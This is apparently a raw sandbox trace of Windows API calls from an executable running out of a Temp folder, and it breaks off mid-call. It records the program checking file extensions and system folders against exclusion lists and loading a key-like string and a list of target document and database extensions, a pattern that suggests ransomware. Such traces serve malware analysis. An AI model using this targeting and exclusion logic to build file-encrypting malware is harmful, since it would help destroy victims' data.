CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0093.822] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0093.822] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0093.822] LockResource (hResData=0x516f58) returned 0x516f58 [0093.822] FreeResource (hResData=0x516f58) returned 0 [0093.822] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.822] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.822] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.822] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d50b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d50b0, cbMultiByte=38, lpWideCharStr=0x14cde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.822] FreeResource (hResData=0x50d64c) returned 0 [0093.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d50b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1464258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1464258, cbMultiByte=97, lpWideCharStr=0x1432ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0093.822] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0093.822] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0093.823] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0093.823] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0093.823] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () 